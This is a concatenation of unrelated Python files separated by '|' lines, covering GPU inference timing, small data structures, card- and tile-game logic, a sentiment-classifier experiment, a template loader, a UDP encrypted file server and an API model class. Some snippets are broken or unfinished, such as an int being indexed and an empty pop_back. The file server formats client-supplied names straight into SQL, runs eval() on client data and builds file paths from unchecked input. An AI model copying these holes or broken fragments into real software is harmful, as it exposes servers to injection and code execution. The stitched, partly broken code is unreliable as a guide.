# numpy_array_input = [input_ids]
# hosts = [input.host for input in inputs]
# trt_types = [trt.int32]
# for numpy_array, host, trt_types in zip(numpy_array_input, hosts, trt_types):
# numpy_array = np.asarray(numpy_array).ravel()
# np.copyto(host, numpy_array)
# def do_inference(context, bindings, inputs, outputs, stream):
# [cuda.memcpy_htod_async(inp.device, inp.host, stream) for inp in inputs]
# context.execute_async_v2(bindings=bindings, stream_handle=stream.handle)
# [cuda.memcpy_dtoh_async(out.host, out.device, stream) for out in outputs]
# stream.synchronize()
# return [out.host for out in outputs]
# trt_outputs = do_inference(
# context=context,
# bindings=bindings,
# inputs=inputs,
# outputs=outputs,
# stream=stream)
def infer(context, input_img, output_size, batch_size):
# Load engine
# engine = context.get_engine()
# assert(engine.get_nb_bindings() == 2)
# Convert input data to float32
input_img = input_img.astype(np.float32)
# Create host buffer to receive data
output = np.empty(output_size, dtype = np.float32)
# Allocate device memory
d_input = cuda.mem_alloc(batch_size * input_img.size * input_img.dtype.itemsize)
d_output = cuda.mem_alloc(batch_size * output.size * output.dtype.itemsize)
bindings = [int(d_input), int(d_output)]
stream = cuda.Stream()
# Transfer input data to device
cuda.memcpy_htod_async(d_input, input_img, stream)
# Execute model
context.execute_async(batch_size, bindings, stream.handle, None)
# Transfer predictions back
cuda.memcpy_dtoh_async(output, d_output, stream)
# Synchronize threads
stream.synchronize()
# Return predictions
return output
# kwargs = {"./dataset/DoS_dataset.csv" : './DoS_dataset.txt'}
# train_data_set, data_idx_map, net_class_count, net_data_count, test_data_set = dataset.GetCanDatasetUsingTxtKwarg(100, 0, **kwargs)
# testloader = torch.utils.data.DataLoader(test_data_set, batch_size=256,
# shuffle=False, num_workers=2)
check_time = time.time()
cnt = 0
temp = np.ones([256, 1, 29, 29])
for idx in range(100):
# for i, (inputs, labels) in enumerate(testloader):
trt_outputs = infer(context, temp, (256, 2), 256)
print(trt_outputs.shape)
# print(trt_outputs)
# print(np.argmax(trt_outputs, axis=0))
# cnt += 1
# if cnt == 100:
# break
print(time.time() - check_time)
tensorrt_file_name = 'bert_int.plan'
TRT_LOGGER = trt.Logger(trt.Logger.WARNING)
trt_runtime = trt.Runtime(TRT_LOGGER)
with open(tensorrt_file_name, 'rb') as f:
engine_data = f.read()
engine = trt_runtime.deserialize_cuda_engine(engine_data)
context = engine.create_execution_context()
check_time = time.time()
cnt = 0
temp = np.ones([256, 1, 29, 29])
for idx in range(100):
# for i, (inputs, labels) in enumerate(testloader):
trt_outputs = infer(context, temp, (256, 2), 256)
print(trt_outputs.shape)
# print(trt_outputs)
# print(np.argmax(trt_outputs, axis=0))
# cnt += 1
# if cnt == 100:
# break
print(time.time() - check_time)
test_model = model.Net().cuda()
check_time = time.time()
cnt = 0
temp = torch.randn(256, 1, 29, 29).cuda()
for idx in range(100):
# for i, (inputs, labels) in enumerate(testloader):
# inputs = inputs.float().cuda()
normal_outputs = test_model(temp)
# print(normal_outputs)
print(normal_outputs.shape)
cnt += 1
if cnt == 100:
break
print(time.time() - check_time)
import tensorrt as trt
import numpy as np
import pycuda.autoinit
import pycuda.driver as cuda
import time
model_path = "bert.onnx"
input_size = 32
TRT_LOGGER = trt.Logger(trt.Logger.WARNING)
# def build_engine(model_path):
# with trt.Builder(TRT_LOGGER) as builder, builder.create_network() as network, trt.OnnxParser(network, TRT_LOGGER) as parser:
# builder.max_workspace_size = 1<<20
# builder.max_batch_size = 1
# with open(model_path, "rb") as f:
# parser.parse(f.read())
# engine = builder.build_cuda_engine(network)
# return engine
def alloc_buf(engine):
# host cpu mem
h_in_size = trt.volume(engine.get_binding_shape(0))
h_out_size = trt.volume(engine.get_binding_shape(1))
h_in_dtype = trt.nptype(engine.get_binding_dtype(0))
h_out_dtype = trt.nptype(engine.get_binding_dtype(1))
in_cpu = cuda.pagelocked_empty(h_in_size, h_in_dtype)
out_cpu = cuda.pagelocked_empty(h_out_size, h_out_dtype)
# allocate gpu mem
in_gpu = cuda.mem_alloc(in_cpu.nbytes)
out_gpu = cuda.mem_alloc(out_cpu.nbytes)
stream = cuda.Stream()
return in_cpu, out_cpu, in_gpu, out_gpu, stream
def inference(engine, context, inputs, out_cpu, in_gpu, out_gpu, stream):
# async version
# with engine.create_execution_context() as context: # cost time to initialize
# cuda.memcpy_htod_async(in_gpu, inputs, stream)
# context.execute_async(1, [int(in_gpu), int(out_gpu)], stream.handle, None)
# cuda.memcpy_dtoh_async(out_cpu, out_gpu, stream)
# stream.synchronize()
# sync version
cuda.memcpy_htod(in_gpu, inputs)
context.execute(1, [int(in_gpu), int(out_gpu)])
cuda.memcpy_dtoh(out_cpu, out_gpu)
return out_cpu
if __name__ == "__main__":
inputs = np.random.random((1, 1, 29, 29)).astype(np.float32)
tensorrt_file_name = '/content/drive/My Drive/capstone1/CAN/bert.plan'
TRT_LOGGER = trt.Logger(trt.Logger.WARNING)
trt_runtime = trt.Runtime(TRT_LOGGER)
with open(tensorrt_file_name, 'rb') as f:
engine_data = f.read()
engine = trt_runtime.deserialize_cuda_engine(engine_data)
# engine = build_engine(model_path)
context = engine.create_execution_context()
for _ in range(10):
t1 = time.time()
in_cpu, out_cpu, in_gpu, out_gpu, stream = alloc_buf(engine)
res = inference(engine, context, inputs.reshape(-1), out_cpu, in_gpu, out_gpu, stream)
print(res)
print("cost time: ", time.time()-t1)
|
n=[]
k=[]
k=int(input())
for i in range(0,k):
k=k[0]+k[1]
|
class node():
"""docstring for node."""
def __init__(self,data = None, parent = None):
self.data = data
self.parent = parent
self.child1 = None
self.child2 = None
class heap():
def __init__(self):
self.head = node()
self.inser = self.head
def add(self, data):
if self.head.data == None:
self.head.data = data
else:
if self.inser.child1 == None:
self.inser.child1 = node(data, self.inser)
else:
self.inser.child2 = node(data, self.inser)
|
import sys
sys.path.append('..')
import cards
import asyncio
from nose.tools import assert_raises
import random
def test_build_deck():
deck = cards.build_deck("Durak", 1)
assert(len(deck) == 36)
def test_create_durak_game():
game = cards.create_durak_game(user_id=33, user_name='tobixen', channel_id=34)
assert(game['owner_id'] == 33)
assert(len(game['players']) == 1)
def test_double_join():
"""
attempts to join a game twice should raise a UserError
"""
game = cards.create_durak_game(user_id=33, user_name='tobixen', channel_id=34)
cards.join_player(game, 34, 'trump')
assert_raises(cards.UserError, cards.join_player, game, 34, 'trump')
assert_raises(cards.UserError, cards.join_player, game, 33, 'tobixen')
def test_start_game():
game = cards.create_durak_game(user_id=33, user_name='tobixen', channel_id=34)
cards.join_player(game, 34, 'trump')
cards.start_game(game)
## there should be no duplicated cards in the deck
assert(len([x.display() for x in game['deck']]) == len(set([x.display() for x in game['deck']])))
def test_join_started():
"""
attempts to join a game that has already started should fail
"""
game = cards.create_durak_game(user_id=33, user_name='tobixen', channel_id=34)
cards.join_player(game, 34, 'trump')
cards.start_game(game)
assert_raises(cards.UserError, cards.join_player, game, 35, 'biden')
def test_use_first_card():
"""
The game creator should start attacking
"""
game = cards.create_durak_game(user_id=33, user_name='tobixen', channel_id=34)
cards.join_player(game, 34, 'trump')
cards.start_game(game)
first_card=game['players'][0]['hand'][0]
asyncio.run(game.use_card(first_card))
def test_wrong_order():
"""
Attempts to play out of order should fail
"""
random.seed(2)
game = cards.create_durak_game(user_id=33, user_name='tobixen', channel_id=34)
cards.join_player(game, 34, 'trump')
cards.start_game(game)
first_card=game['players'][0]['hand'][0]
second_card=game['players'][1]['hand'][0]
## Second card belongs to second player, first player has to start the turn
assert_raises(cards.UserError, asyncio.run, game.use_card(second_card))
## This is OK
asyncio.run(game.use_card(first_card))
## This is not OK, defender should play, and card has already been played
assert_raises(cards.UserError, asyncio.run, game.use_card(first_card))
## With the given random seed, this works fine
asyncio.run(game.use_card(second_card))
## card has already been played, an error should be raised
assert_raises(cards.UserError, asyncio.run, game.use_card(first_card))
def test_wrong_defence():
"""
The card played has to be higher and of the same order or trump
"""
random.seed(1)
game = cards.create_durak_game(user_id=33, user_name='tobixen', channel_id=34)
cards.join_player(game, 34, 'trump')
cards.start_game(game)
first_card=game['players'][0]['hand'][0] ## King of diamond (trump)
second_card=game['players'][1]['hand'][0] ## Queen of diamond
asyncio.run(game.use_card(first_card))
assert_raises(cards.UserError, asyncio.run, game.use_card(second_card))
def test_skip():
"""
Game on, attacker skips to continue attacking
"""
random.seed(2)
game = cards.create_durak_game(user_id=33, user_name='tobixen', channel_id=34)
cards.join_player(game, 34, 'trump')
cards.start_game(game)
first_card=game['players'][0]['hand'][0]
second_card=game['players'][1]['hand'][0]
assert_raises(cards.UserError, asyncio.run, game.use_card(second_card))
asyncio.run(game.use_card(first_card))
asyncio.run(game.use_card(second_card))
asyncio.run(game.skip([33]))
def test_pick_up():
"""
Game on, attacker plays second attack and defender draws
"""
random.seed(2)
game = cards.create_durak_game(user_id=33, user_name='tobixen', channel_id=34)
cards.join_player(game, 34, 'trump')
cards.start_game(game)
first_card=game['players'][0]['hand'][0] ## JD
second_card=game['players'][1]['hand'][0] ## AD
third_card=game['players'][0]['hand'][3] ## JC
fourth_card=game['players'][0]['hand'][1]
fifth_card=game['players'][1]['hand'][1]
assert_raises(cards.UserError, asyncio.run, game.use_card(second_card))
asyncio.run(game.use_card(first_card))
asyncio.run(game.use_card(second_card))
asyncio.run(game.use_card(third_card))
asyncio.run(game.pick_up(34))
def test_game_on():
"""
Game on ... round #2 after pick_up
"""
random.seed(2)
game = cards.create_durak_game(user_id=33, user_name='tobixen', channel_id=34)
cards.join_player(game, 34, 'trump')
cards.start_game(game)
first_card=game['players'][0]['hand'][0] ## JD
second_card=game['players'][1]['hand'][0] ## AD
third_card=game['players'][0]['hand'][3] ## JC
fourth_card=game['players'][0]['hand'][1]
fifth_card=game['players'][1]['hand'][1]
assert_raises(cards.UserError, asyncio.run, game.use_card(second_card))
asyncio.run(game.use_card(first_card))
asyncio.run(game.use_card(second_card))
asyncio.run(game.use_card(third_card))
asyncio.run(game.pick_up(34))
## should fail - card has already been played
assert_raises(cards.UserError, asyncio.run, game.use_card(first_card))
## should fail - defender is still defender after picking
assert_raises(cards.UserError, asyncio.run, game.use_card(fifth_card))
asyncio.run(game.use_card(fourth_card))
asyncio.run(game.use_card(fifth_card))
asyncio.run(game.skip([33]))
def test_longer_game():
random.seed(8)
game = cards.create_durak_game(user_id=33, user_name='tobixen', channel_id=34)
cards.join_player(game, 34, 'trump')
cards.join_player(game, 35, 'biden')
cards.start_game(game)
print(f"trump is {game['trump'].display()}")
hands = [game['players'][x]['hand'] for x in range(3)]
## The king of clubs is in trumps hand. It should not be in the deck. (observed bug 2020-10-29
assert(not 'KC' in [x.display() for x in game['deck']])
assert( 'KC' in [x.display() for x in hands[1]])
def print_hands():
for i in range(3):
print(f"Player {game['players'][i]['player_name']} has this hand:")
print(" ".join([x.display() for x in hands[i]]))
print(f"Cards on the table:")
print(" ".join([x.display() for x in game['cards']]))
print_hands()
asyncio.run(game.use_card(hands[0][1]))
asyncio.run(game.use_card(hands[1][3]))
asyncio.run(game.use_card(hands[2][3]))
asyncio.run(game.use_card(hands[1][3]))
asyncio.run(game.skip([33]))
asyncio.run(game.use_card(hands[2][2]))
asyncio.run(game.use_card(hands[1][3]))
print_hands()
assert(not 'KC' in [x.display() for x in game['deck']])
asyncio.run(game.skip([33,35]))
## Card KC has been thrown and should be nowhere to be found
assert(not 'KC' in [x.display() for x in game['deck']])
assert(not 'KC' in [x.display() for x in hands[0]])
assert(not 'KC' in [x.display() for x in hands[1]])
assert(not 'KC' in [x.display() for x in hands[2]])
## All players should have six cards
assert(len(hands[0])==6)
assert(len(hands[1])==6)
assert(len(hands[2])==6)
print_hands()
|
from __future__ import annotations
from Engine.Elements.board import Board
from Engine.Elements.center import Center
from Engine.Elements.discard import Discard
from Engine.Elements.factory import Factory
from typing import List, Union
class Player:
has_starting_marker = False
def __init__(self, player_id: int, board: Board, center: Center, discard: Discard, factories: List[Factory]):
self.id = player_id
self.score = 0
self._board = board
self._center = center
self._discard = discard
self._factories = factories
self._opponents: List[Player] = []
def set_opponents(self, opponents: List[Player]):
self._opponents = opponents
def end_game_condition_met(self):
return self._board.end_game_condition_met
def end_turn_reset(self):
self._board.end_turn_reset_rows()
deduction, discard_tiles = self._board.reset_floor()
self._board.score -= deduction
self.score = self._board.score
self._discard.add_bag(discard_tiles)
def state(self):
start_tile = self._center.has_starting_tile
rows = self._board.rows
wall = self._board.wall
opponent_rows = [player._board.rows for player in self._opponents]
opponent_wall = [player._board.wall for player in self._opponents]
center_tiles = [self._center.tiles]
factory_tiles = [factory.tiles for factory in self._factories]
return rows, wall, opponent_rows, opponent_wall, start_tile, center_tiles, factory_tiles
# interface for AI to make choices
def make_choice(self, source: Union[Center, Factory], color: int, row: int):
# return True if valid choice
# return False if invalid choice
if isinstance(source, Factory):
success, tiles = source.claim_tile(color)
if not success:
return False
elif isinstance(source, Center):
success, tiles = source.claim_tile(color)
if not success:
return False
if source.has_starting_tile:
self.has_starting_marker = True
source.has_starting_tile = False
# add starting tile to board.
self._board.floor += [-1]
else:
return False
# guaranteed to have 1 tile at least
# return False if wrong color, color already on wall, or row filled
success = self._board.fill_row(row, color, len(tiles))
if not success:
return False
return True
|
from methods import Methods
class experiment:
def __init__(self):
self.method = Methods()
def testNB(self):
badWords = ['fuck','damn','work','cunt','bitch','whore','asshole']
lines = self.openFile("testing.txt")
results_NB = []
results_NB_noC = []
results_NB_bad = []
results_NB_noC_bad = []
for toCheck in lines:
status = toCheck.split(";")[1]
results_NB.append(self.method.rate_status(status,2,[]))
results_NB_noC.append(self.method.rate_status(status,3,[]))
results_NB_bad.append(self.method.rate_status(status,2,badWords))
results_NB_noC_bad.append(self.method.rate_status(status,3,badWords))
scores = [0,0,0,0]
scoresn =[0,0,0,0]
for i in range(len(lines)):
rate = lines[i].split(";")[0]
if rate == 'negative':
if rate == results_NB[i]:
scoresn[0] +=1
if rate == results_NB_noC[i]:
scoresn[1] +=1
if rate == results_NB_bad[i]:
scoresn[2] +=1
if rate == results_NB_noC_bad[i]:
scoresn[3] +=1
if rate == results_NB[i]:
scores[0] +=1
if rate == results_NB_noC[i]:
scores[1] +=1
if rate == results_NB_bad[i]:
scores[2] +=1
if rate == results_NB_noC_bad[i]:
scores[3] +=1
print(scores)
print(scoresn)
def openFile(self,name):
this = open(name,'r')
toReturn = []
for i in this.readlines():
toReturn.append(i[:-1])
return toReturn
def testKNN(self):
badWords= "fuck damn work cunt bitch whore asshole horny shit"
lines = self.openFile("testing.txt")
results_KNN = []
results_KNN_noC = []
results_KNN_bad = []
results_KNN_noC_bad = []
for toCheck in lines:
status = toCheck.split(";")[1]
results_KNN.append(self.method.kNN_getClass(status,2,""))
results_KNN_noC.append(self.method.kNN_getClass(status,3,""))
results_KNN_bad.append(self.method.kNN_getClass(status,2,badWords))
results_KNN_noC_bad.append(self.method.kNN_getClass(status,3,badWords))
scores = [0,0,0,0]
scoresn =[0,0,0,0]
for i in range(len(lines)):
rate = lines[i].split(";")[0]
if rate == 'negative':
if rate == results_KNN[i]:
scoresn[0] +=1
if rate == results_KNN_noC[i]:
scoresn[1] +=1
if rate == results_KNN_bad[i]:
scoresn[2] +=1
if rate == results_KNN_noC_bad[i]:
scoresn[3] +=1
if rate == results_KNN[i]:
scores[0] +=1
if rate == results_KNN_noC[i]:
scores[1] +=1
if rate == results_KNN_bad[i]:
scores[2] +=1
if rate == results_KNN_noC_bad[i]:
scores[3] +=1
print(scores)
print(scoresn)
test1=experiment()
test1.testNB()
test1.testKNN()
|
# -*- encoding: utf-8 -*-
import yaml
import os.path
from .database import *
from .exceptions import *
class Template(object):
"""Classe Template
- Utilizada para obter e gerenciar a base dos templates.
Atributos:
- template_list (private:list): Lista de templates
- templates (private:list): Templates
- path (private:string): caminho para os arquivos
- temp_extension (private:string): extensão dos arquivos de template
"""
__template_list = None
__templates = None
__path = None
__temp_extension = None
def __init__(self, path="", list_file=None, extension=".html"):
"""Método construtor da Classe
- Durante o instanciamento, os arquivos de lista e templates
- são lidos e armazenados nos atributos específicos.
Argumentos:
- self (object): instância da própria classe
- list_file (string): nome do arquivo da lista de templates (obrigatório)
- path (string): caminho para o arquivo (default=string vazia)
- extension (string): extensão opcional dos arquivos de template (default=".tmp")
Retorno:
- Sem retorno
"""
# Previne instanciamento duplicado
self.__template_list = DataList(path, list_file)
self.__templates = list()
# Seta um novo path caso seja diferete do padrão
if path != self.__path:
self.__path = path
# Seta uma nova extensão caso seja diferente do padrão
if extension != self.__temp_extension:
self.__temp_extension = extension
# Seta os templates a partir da lista
self.__set_templates()
def __set_template_list(self, temp_dict={}):
"""Método privado __set_template_list
- Percorre uma dict para forçar que seja usada somente a
- primeira posição e atribui o resultado ao atributo privado
- __template_list (list).
Argumentos:
- self (object): instância da própria classe
- temp_dict (dict): dict herdada do yaml (default=dict vazio)
Retorno:
- Sem retorno
"""
template_list = []
# Percorre a dict para atribuir a uma list
for i in temp_dict:
template_list.append(temp_dict[i])
# Atribui à nova lista somente a primeira posição da list
self.__template_list = template_list[0]
def get_template_list(self):
"""Método público get_template_list
- Retorna a lista dos templates disponíveis.
Argumentos:
- self (object): instância da própria classe
Retorno:
- self.__template_list (lsit): lista de templates
"""
return self.__template_list.get_data_list()
def __set_templates(self, path=None, extension=None):
"""Método privado __set_templates
- Obtém os templates contidos na lista de templates e
- atribui no atributo privado __templates (list).
Argumentos:
- self (object): instância da própria classe
- path (string): caminho dos arquivos dos templates (default=None)
- extension (string): extensão dos arquivos (default=None)
Retorno:
- Sem retorno
"""
# Se não foi definido um template, obtém do padrão
if not path:
path = self.__path
# Se não foi definido uma extensão, obtém do padrão
if not extension:
extension = self.__temp_extension
temps = []
# Faz um loop pela lista de templates para obtê-los
for i in self.get_template_list():
try:
template = open(path+i+extension,"r", encoding='utf-8')
temps.append(template.read())
template.close()
except IOError:
TemplateException("O arquivo "+i+extension+" não foi encontrado!")
exit(1)
# Seta o resultado no atriburo templates
self.__templates = temps
def get_templates(self):
"""Método público get_templates
- Retorna todos os templates (list).
Argumentos:
- self (object): instância da própria classe
Retorno:
- self.__templates (list): lista com os templates
"""
return self.__templates
def __str__(self):
"""Método público
- Retorna todos os templates em uma única string.
Argumentos:
- self (object): instância da própria classe
Retorno:
- self.__templates (string): templates em uma única string
"""
# Junta todas as posições da list em uma string
return str("".join(self.get_templates()))
def __call__(self, term):
if term == "string":
return str(self)
class Header(object):
def __init__(self, dict_):
self.__dict__ = dict_
class StaticTemplate(object):
def __init__(self, file_=None, path_='_static'):
template_f = open(os.path.join(path_, file_), 'r', encoding='utf-8')
static_temp = template_f.read()
template_f.close()
del template_f
import re
re_reader = re.search(r'^(---)([\n\S\s])+\n(---)', static_temp)
if re_reader is not None:
header = yaml.load(re_reader.group(0).replace('---',''))
static_temp = re.sub(r'^(---)([\n\S\s])+\n(---)', '', static_temp)
else:
header = {'layout':None, 'route':None, 'title':None}
self.base = static_temp
self.data = Header(header)
if __name__ == '__main__':
pass
|
'''
@Description:
@Date: 2020-04-13 20:50:06
@Author: Wong Symbol
@LastEditors: Wong Symbol
@LastEditTime: 2020-05-30 17:17:50
'''
'''
双端队列
在队列的两端都可以进行出队和入队
'''
class Node:
def __init__(self, data=None):
self.data = data
self._next = None
# 双端队列
class Deque:
def __init__(self, _head=None, _tail=None):
self._head = _head
self._tail = _tail
def push_front(self, val):
new_node = Node(val)
if self._head == None:
self._head = new_node
self._tail = new_node
else:
new_node._next = self._head
self._head = new_node
def push_back(self, val):
new_node = Node(val)
if self._head == None:
self._head = new_node
self._tail = new_node
else:
self._tail._next = new_node
self._tail = new_node
def pop_front(self):
head = self._head
if head:
val = head.data
self._head = head._next
return val
return -1
# 单向链式节点想要实现此方法较为复杂,因为要删除节点的前一个节点不容易获取
# 需要双指针遍历
# 所以最好使用双向链式节点
def pop_back(self):
tail = self._tail
if tail:
val = tail.data
def show(self):
head = self._head
while head:
print(head.data)
head = head._next
if __name__ == "__main__":
d = Deque()
d.push_front(1)
d.push_front(2)
d.push_back(3)
print(d.pop_front())
print(d.pop_front())
print(d.pop_front())
d.show()
print('#'*4)
# print('tail:', d._tail.data)
# print('head:', d._head.data)
|
import logging
import auth
import json
import socket
import jwt
import argparse
import encrypt
import json
import pre
import chain
from gmssl import sm2
success_res = json.dumps({
'status': '200',
'msg': ''
})
error_res = lambda msg: json.dumps({
'status': '401',
'msg': msg
})
parser = argparse.ArgumentParser(description='chatroom server')
parser.add_argument('-p', metavar='PORT', type=int, default=51742,
help='UDP port (default 51742)')
args = parser.parse_args()
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(('127.0.0.1', args.p))
logging.info('crypto server established')
MAX_BYTES = 4096
clients = {}
while True:
req_data, address = sock.recvfrom(MAX_BYTES)
req_data = req_data.decode('ascii')
logging.info('the server received {}'.format(req_data))
j_parsed = json.loads(req_data)
mode = j_parsed['mode']
if mode == 'REGISTER':
res_data = auth.register(j_parsed['username'], j_parsed['pubkey'])
elif mode == 'LOGIN':
res_data = auth.login(j_parsed['username'],
j_parsed['timeval'], j_parsed['signature'])
if address not in clients.values():
clients[j_parsed['username']] = address
elif mode == 'TEST':
res_data = success_res
else:
try:
claims = jwt.decode(j_parsed['jwt'].encode('ascii'),
auth.jwt_secret, algorithm='HS256')
except:
res_data = error_res('you have not logged in')
else:
file_progress = 'collecting {}: {}/{} bytes % {:.2f}'
if mode == 'UP':
file_length = int(j_parsed['length'])
file_name = j_parsed['name']
file_data = b''
res_data = json.dumps({
'status': '201',
'msg': 'ready'
})
sock.sendto(res_data.encode('ascii'), address)
logging.info('receiving file from {}:{}'.format(*address))
# collect file fragments
while len(file_data) < file_length:
# \x1b[2K\r
percent = 100 * len(file_data) / file_length
print(file_progress \
.format(file_name, len(file_data), file_length, percent))
file_frag, up_addr = sock.recvfrom(MAX_BYTES)
if address == up_addr:
file_data += file_frag
print('\x1b[2K', end='\r')
logging.info('{} received total length {} bytes' \
.format(file_name, file_length))
# encrypt to .enc file
enc_result = encrypt.encrypt(file_data)
with open('documents/%s.enc' % file_name, 'wb') as f:
f.write(enc_result['enc'])
# update database
sql = """
INSERT INTO Files (Filename, Uploader, Pubkey, Pvtkey, length)
VALUES ('{}', '{}', '{}', '{}', '{}')
""".format(file_name, claims['username'],
enc_result['pubkey'], enc_result['pvtkey'], len(enc_result['enc']))
pre.insert(sql)
logging.info('database file list updated')
res_data = success_res
elif mode == 'DOWN':
file_name = j_parsed['name']
sql = "SELECT Pvtkey, Length FROM Files WHERE FileName='%s'" % file_name
selected = pre.select(sql)[0]
file_length = selected[1]
# encrypt file-pvt key with user's pubkey
sm2_crypt = sm2.CryptSM2(public_key=claims['pubkey'], private_key='')
res_data = json.dumps({
'status': '200',
'enc_pvtkey': selected[0],
'length': file_length
})
sock.sendto(res_data.encode('ascii'), address)
logging.info('the server sent {}'.format(res_data))
# fragment and send files
sent_len = 0
with open('documents/%s.enc' % file_name, 'rb') as f:
while sent_len < file_length:
percent = 100 * sent_len / file_length
print(file_progress \
.format(file_name, sent_len, file_length, percent))
sock.sendto(f.read(MAX_BYTES), address)
sent_len += MAX_BYTES
logging.info('{} sent total length {} bytes' \
.format(file_name, file_length))
res_data = success_res
elif mode == 'FILELIST':
sql = "SELECT DISTINCT FileName FROM Files"
selected = pre.select(sql)
res_data = json.dumps({
'status': '200',
'names': [item[0] for item in selected]
})
elif mode == 'CHAIN':
prev_visitor = j_parsed['pv']
file_name = j_parsed['name']
info = {
'time_stamp': eval(prev_visitor[0]),
'signature': eval(prev_visitor[1]),
'ip_addr': eval(prev_visitor[2]),
'id': eval(prev_visitor[3])
}
chain.chain(info, 'documents/%s.enc' % file_name)
res_data = success_res
# if mode == 'PUBLIC':
# message = '{}[{}]: {}'.format(claims['username'], time_stamp, j_parsed['msg'])
# for user in clients:
# try:
# sock.sendto(json.dumps({
# 'status': '200',
# 'msg': message
# }).encode('ascii'), clients[user])
# except:
# del clients[user]
# res_data = json.dumps({
# 'status': '200',
# 'msg': ''
# })
# elif mode == 'TO':
# message = '{}->{}[{}]: {}'.format(claims['username'], j_parsed['username'], time_stamp, j_parsed['msg'])
# try:
# sock.sendto(json.dumps({
# 'status': '200',
# 'msg': message
# }).encode('ascii'), clients[j_parsed['username']])
# res_data = json.dumps({
# 'status': '200',
# 'msg': message
# })
# except:
# del clients[user]
# res_data = json.dumps({
# 'status': '404',
# 'msg': 'target user offline'
# })
sock.sendto(res_data.encode('ascii'), address)
logging.info('the server sent {}'.format(res_data))
|
# -*- coding: utf-8 -*-
"""
ytelapi
This file was automatically generated by APIMATIC v2.0 ( https://apimatic.io ).
"""
class Body77(object):
"""Implementation of the 'body_77' model.
TODO: type model description here.
Attributes:
mfrom (string): A valid Ytel Voice enabled number (E.164 format) that
will be initiating the phone call.
to (string): Please enter multiple E164 number. You can add max 10
numbers. Add numbers separated with comma. e.g :
+12223334444,+15556667777
url (string): URL requested once the call connects
group_confirm_key (string): Define the DTMF that the called party
should send to bridge the call. Allowed Values : 0-9, #, *
group_confirm_file (GroupConfirmFileEnum): Specify the audio file you
want to play when the called party picks up the call
method (string): Specifies the HTTP method used to request the
required URL once call connects.
status_call_back_url (string): URL that can be requested to receive
notification when call has ended. A set of default parameters will
be sent here once the call is finished.
status_call_back_method (string): Specifies the HTTP methodlinkclass
used to request StatusCallbackUrl.
fall_back_url (string): URL requested if the initial Url parameter
fails or encounters an error
fall_back_method (string): Specifies the HTTP method used to request
the required FallbackUrl once call connects.
heart_beat_url (string): URL that can be requested every 60 seconds
during the call to notify of elapsed time and pass other general
information.
heart_beat_method (string): Specifies the HTTP method used to request
HeartbeatUrl.
timeout (int): Time (in seconds) we should wait while the call is
ringing before canceling the call
play_dtmf (string): DTMF Digits to play to the call once it connects.
0-9, #, or *
hide_caller_id (string): Specifies if the caller id will be hidden
record (bool): Specifies if the call should be recorded
record_call_back_url (string): Recording parameters will be sent here
upon completion
record_call_back_method (string): Method used to request the
RecordCallback URL.
transcribe (bool): Specifies if the call recording should be
transcribed
transcribe_call_back_url (string): Transcription parameters will be
sent here upon completion
"""
# Create a mapping from Model property names to API property names
_names = {
"mfrom":'From',
"to":'To',
"url":'Url',
"group_confirm_key":'GroupConfirmKey',
"group_confirm_file":'GroupConfirmFile',
"method":'Method',
"status_call_back_url":'StatusCallBackUrl',
"status_call_back_method":'StatusCallBackMethod',
"fall_back_url":'FallBackUrl',
"fall_back_method":'FallBackMethod',
"heart_beat_url":'HeartBeatUrl',
"heart_beat_method":'HeartBeatMethod',
"timeout":'Timeout',
"play_dtmf":'PlayDtmf',
"hide_caller_id":'HideCallerId',
"record":'Record',
"record_call_back_url":'RecordCallBackUrl',
"record_call_back_method":'RecordCallBackMethod',
"transcribe":'Transcribe',
"transcribe_call_back_url":'TranscribeCallBackUrl'
}
def __init__(self,
mfrom=None,
to=None,
url=None,
group_confirm_key=None,
group_confirm_file=None,
method=None,
status_call_back_url=None,
status_call_back_method=None,
fall_back_url=None,
fall_back_method=None,
heart_beat_url=None,
heart_beat_method=None,
timeout=None,
play_dtmf=None,
hide_caller_id=None,
record=None,
record_call_back_url=None,
record_call_back_method=None,
transcribe=None,
transcribe_call_back_url=None):
"""Constructor for the Body77 class"""
# Initialize members of the class
self.mfrom = mfrom
self.to = to
self.url = url
self.group_confirm_key = group_confirm_key
self.group_confirm_file = group_confirm_file
self.method = method
self.status_call_back_url = status_call_back_url
self.status_call_back_method = status_call_back_method
self.fall_back_url = fall_back_url
self.fall_back_method = fall_back_method
self.heart_beat_url = heart_beat_url
self.heart_beat_method = heart_beat_method
self.timeout = timeout
self.play_dtmf = play_dtmf
self.hide_caller_id = hide_caller_id
self.record = record
self.record_call_back_url = record_call_back_url
self.record_call_back_method = record_call_back_method
self.transcribe = transcribe
self.transcribe_call_back_url = transcribe_call_back_url
@classmethod
def from_dictionary(cls,
dictionary):
"""Creates an instance of this model from a dictionary
Args:
dictionary (dictionary): A dictionary representation of the object as
obtained from the deserialization of the server's response. The keys
MUST match property names in the API description.
Returns:
object: An instance of this structure class.
"""
if dictionary is None:
return None
# Extract variables from the dictionary
mfrom = dictionary.get('From')
to = dictionary.get('To')
url = dictionary.get('Url')
group_confirm_key = dictionary.get('GroupConfirmKey')
group_confirm_file = dictionary.get('GroupConfirmFile')
method = dictionary.get('Method')
status_call_back_url = dictionary.get('StatusCallBackUrl')
status_call_back_method = dictionary.get('StatusCallBackMethod')
fall_back_url = dictionary.get('FallBackUrl')
fall_back_method = dictionary.get('FallBackMethod')
heart_beat_url = dictionary.get('HeartBeatUrl')
heart_beat_method = dictionary.get('HeartBeatMethod')
timeout = dictionary.get('Timeout')
play_dtmf = dictionary.get('PlayDtmf')
hide_caller_id = dictionary.get('HideCallerId')
record = dictionary.get('Record')
record_call_back_url = dictionary.get('RecordCallBackUrl')
record_call_back_method = dictionary.get('RecordCallBackMethod')
transcribe = dictionary.get('Transcribe')
transcribe_call_back_url = dictionary.get('TranscribeCallBackUrl')
# Return an object of this model
return cls(mfrom,
to,
url,
group_confirm_key,
group_confirm_file,
method,
status_call_back_url,
status_call_back_method,
fall_back_url,
fall_back_method,
heart_beat_url,
heart_beat_method,
timeout,
play_dtmf,
hide_caller_id,
record,
record_call_back_url,
record_call_back_method,
transcribe,
transcribe_call_back_url)
|
#!/usr/bin/env python
'''
This file is used when you want to control a single robot
i.e., the first rover that computer connects to
'''
import roslib; roslib.load_manifest('br_swarm_rover')
import socket
import array
class RovCon():
def __init__(self, networkCard):
self.nic = networkCard
self._robot_id = self.nic.split('.')[3]
# all Brookstone rovers v1.0 have same host and port numbers
self.host = '192.168.1.100'
self.port = 80
self.max_tcp_buffer = 2048
try:
self.move_socket = \
socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.final_data = ''
self.init_connection()
